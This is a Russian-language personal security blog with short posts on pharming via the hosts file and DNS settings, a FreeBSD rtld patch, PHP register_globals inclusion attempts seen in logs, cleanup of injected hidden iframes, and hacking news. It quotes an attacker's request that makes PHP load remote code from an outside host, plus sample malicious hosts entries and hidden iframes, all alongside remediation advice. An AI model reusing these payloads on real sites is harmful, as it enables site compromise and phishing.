NetSpider – персональный блог

Фарминг-атаки – это атаки, при которых браузер пользователя скрытно направляется на фишинговый (поддельный) сайт.

Файл hosts

По умолчанию, файл HOSTS лежит в каталоге %SYSTEMROOT%\system32\drivers\etc (другой вариант указания пути: %WINDIR%\system32\drivers\etc).

Вирус изменяет этот файл, прописывая (добавляя) там строку с IP-адресом и именем фишингового сайта (точнее, подделываемого):

1.1.1.1 vkontakte.ru

Теперь при заходе на сайт ВКонтакте, браузер пользователя будет загружать его с адреса злоумышленника – 1.1.1.1.

Для восстановления работоспособности, в файле HOSTS следует удалить все строчки, оставив только 127.0.0.1 localhost и те, которые лично вы туда добавляли (если добавляли). Не забудьте сменить пароли ко всем веб-сервисам, которыми вы пользуетесь и фишинговые сайты которых были указаны в измененном файле HOSTS.

/!\ Важно! После внесения изменений в файл HOSTS, следует перезапустить все открытые браузеры, а лучше всего, – перезагрузить компьютер.

Местоположение файла HOSTS

Модификацию файла HOSTS легко обнаружить. В поисках путей повышения скрытности своих действий, злоумышленники придумали изменять местоположение файла HOSTS. Путь к файлу HOSTS может быть изменен путем определения нового значения в ключе системного реестра DataBasePath ветки HKLM\System\ControlSet001\Services\tcpip\parameters (лучше посмотреть все ветки, начиная с CurrentControlSet и до ControlSet001/N). Так Trojan.BAT.Delude.e создает собственный файл HOSTS в каталоге %WINDIR%\Help и устанавливает путь к нему в системном реестре, а Trojan-Downloader.Win32.Esepor.z устанавливает путь %WINDIR%\NSDB к файлу HOSTS.

Если в данном ключе прописан путь, отличный от %SystemRoot%\System32\drivers\etc, то проверьте файл HOSTS по указанному там пути, чтобы узнать, к каким сайтам имеет смысл менять пароли. Затем поменяйте путь на стандартный, а зловредный файл HOSTS удалите.

Проверка настроек DNS-серверов

Еще один метод фарминга заключается в указании DNS-серверов злоумышленника. Например, вредоносная программаTrojan.Win32.DNSChanger.pwf заменяет указанные в операционной системе DNS-сервера на DNS-сервера злоумышленников путем изменений в системном реестре.

Для обнаружения такого типа фарминг-атаки выполните команду:

ipconfig /all

которая выведет вам все настройки сетевых интерфейсов. Проверьте указанные там "DNS Servers" и сравните их с выданными вам вашим провайдером.
Если обнаружите, что DNS-сервера подменены, то восстановить корректные значения можно в настройках свойств TCP/IP.

по материалам habrahabr

Теги: DNS, hosts, Microsoft, pharming, phishing, spoofing, TCP, trojan, Windows, взлом, вирусы, трояны, фарминг, фишинг, хакеры

Случилось то, чего все ждали боялись. Аську купили россияне.

Digital Sky Technologies купил ICQ за $187,5 млн.

Теперь ушлые коммерсанты требуют деньги у всех альтернативных клиентов, надеясь ан выплаты или на то, что народ перебежит с отказавшихся альтернативных клиентов на их "родной" и станет смотреть рекламу.

Авторы мобильного клиента Nimbuzz уже опубликовали отчет о причинах, почему не работает ICQ в их клиенте. Новые владельцы ICQ потребовали выплаты за каждого пользователя ICQ, авторы Nimbuzz отказались, т.к. распространяют свою программу абсолютно  бесплатно.

Альтернатив две – Jabber (GTalk) и Skype. Есть конечно и другие клиенты и сети, но они мало распространены.

GTalk – Jabber в интерпретации Google

Гуглопочта есть у очень многих людей и перейти на общение в GTalk совсем не сложно, можно пользоваться любым Jabber-клиентом или оригинальным клиентом Гугла, в том числе веб-клиентом.

Skype

Скайп на самом деле очень хороший клиент, но ИМХО не для большого количества контактов (в аське у меня под 1000 контактов).

QIP Infium

А QIP – дырявое сито, в котором по умолчанию пароли хранятся на сервере. Не ждите, пока клюнет жареный петух, переходите на другие клиенты, например, ту же Миранду. И не забудьте сменить пароли на аккаунтах.

Теги: client, DST, Google, GTalk, icq, Infium, Jabber, Miranda, Nimbuzz, Oscar, QIP, skype, Talk, аська, взлом, джаббер, протокол, скайп

В операционной системе FreeBSD найдена опасная уязвимость. Эксплойт вышел в паблик раньше, чем патч, так что скорее включайте /dev/hands:

cd /usr/src/libexec/rtld-elf
fetch http://people.freebsd.org/~cperciva/rtld.patch
patch < rtld.patch
make & make install

Уязвимости подвержены все версии от 7.1 до 8.0.

Сам эксплойт под катом.

ЗЫ

Проверено, эксплойт работает.

ЗЗЫ

У меня не получилось пропатчить, скопировать кусок кода вручную. Дырка закрыта

Читать остальную часть заметки »

Теги: exploit, FreeBSD, patch, root, rootkit, unix, взлом

Хакеры, а точнее скрипткиды, не спят. Несколько дней назад на мой сайт начали проводиться попытки атак запросами, эксплуатирующими старую уязвимость в PHP.

/var/log/messages:
Oct  4 03:23:34 220 suhosin[28420]: ALERT – tried to register forbidden variable ‘_SERVER[DOCUMENT_ROOT]‘ through GET variables (attacker ‘77.242.37.212‘, file ‘/xxx/domain.tld/index.php’)

Пример запроса (из лога апача):
211.111.213.195 – - [05/Oct/2009:08:26:22 +0300] “GET //?_SERVER[DOCUMENT_ROOT]=http://www.hotlinkfiles.com/files/2380695_oajch/IDtest.txt??? HTTP/1.1″ 302 – “-” “Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)”

Файл IDtest.txt все еще доступен для скачивания. Видимо никто еще на него не жаловался или хостинг игнорирует абузы.

Как защититься?

a) обновите PHP;
b) не включайте register_globals (оставьте Off);
c) дополнительно можете пользоваться патчем/модулем suhosin.

Теги: apache, document_root, get, idtest.txt, PHP, server, web, взлом, скрипткид, скрипты, уязвимость, хак

По мотивам предыдущей заметки =)

Итак, если ваш сайт взломан или подобран пароль к вашему фтп-аккаунту и в некоторых (или во всех) файлах присутствует вражеский код iframe – самое время заняться чисткой.

Обнаружение противника

Для начала вражеский код нужно обнаружить. Самый безопасный и правильный подход – найти подозрительные участки кода в зараженных файлах и детерминировать их как вредоносные.

find . -name “*.php*” -or -name “*.*htm*” -exec grep “iframe” {} \; -print | less

В результате вы увидите код ифреймов и пути к зараженным файлам:

<iframe src=”site.ru” width=”0″></iframe>
/root/temp/3/1.htm
<iframe src=”site.ru” width=”0″></iframe>
/root/temp/3/1.shtml
<iframe src=”site.ru” width=”0″></iframe>
/root/temp/3/1.html

Если не хотите видеть путь к файлам (в принципе, на данном этапе он и не нужен), уберите ключ -print.

Читать остальную часть заметки »

Теги: console, find, FreeBSD, grep, iframe, sed, shell, ssh, взлом, вирусы, трояны, файлы, фтп, хостинг, чистка кода

По всей видимости, в компанию СпутникМедиа пришел кризис – bigmir.net накручивает показы с помощью iframe. Эта тема сейчас активно обсуждается в листе рассылки Webman. Есть также версия, что это просто подстава, только кому она выгодна? А тем временем, на страницах сайтов можно найти коде ифрейма:

<iframe src=”hxxp://metanscript.com/s/in.cgi?4″ width=”0″ height=”0″ scrolling=”no” frameborder=”0″></iframe>

17:25 [220] ~ ~> wget –spider “hxxp://metanscript.com/s/in.cgi?4″
Spider mode enabled. Check if remote file exists.
–2009-08-19 17:25:45–  hxxp://metanscript.com/s/in.cgi?4
Resolving metanscript.com… 213.163.89.35
Connecting to metanscript.com|213.163.89.35|:80… connected.
HTTP request sent, awaiting response… 302 Found
Location: hxxp://www.bigmir.net/ [following]
Spider mode enabled. Check if remote file exists.
–2009-08-19 17:25:45–  hxxp://www.bigmir.net/
Resolving www.bigmir.net… 193.239.68.40
Connecting to www.bigmir.net|193.239.68.40|:80… connected.
HTTP request sent, awaiting response… 200 OK
Length: unspecified

[/text]


Remote file exists and could contain further links,
but recursion is disabled — not retrieving.

Читать остальную часть заметки »

Теги: banner, bigmir.net, headers, iframe, metanscript, sex-test.org, spider, top, Webman, wget, баннеры, бигмир, взлом, ифрейм, накрутка, посещаемость, реклама, рекламодатели, скрипт, СпутникМедиа, счетчик

Хакеры взломали официальный сайт Организации Объединенных Наций. “Израиль и США не должны убивать детей и простых людей”, – говорится в заявлении взломщиков, которое было вывешено в разделе сообщений генсека ООН англоязычной версии сайта.

Таким образом взломщики хотели выразить свой киберпротест против войны на Ближнем Востоке. На русскоязычной версии сайта ООН данного сообщения нет. Некоторые СМИ отмечают, что на других сайтах уже были обнаружены следы нападений тех же хакеров, которые позволяют предположить, что, по крайней мере, один из них – турецкого происхождения.

Источник: http://www.rbc.ru

Дата: 12.08.2007

Два года спустя:
Читать остальную часть заметки »

Теги: SQL-инъекция, UN, взлом, дыра, ООН, сайт, уязвимость, хакеры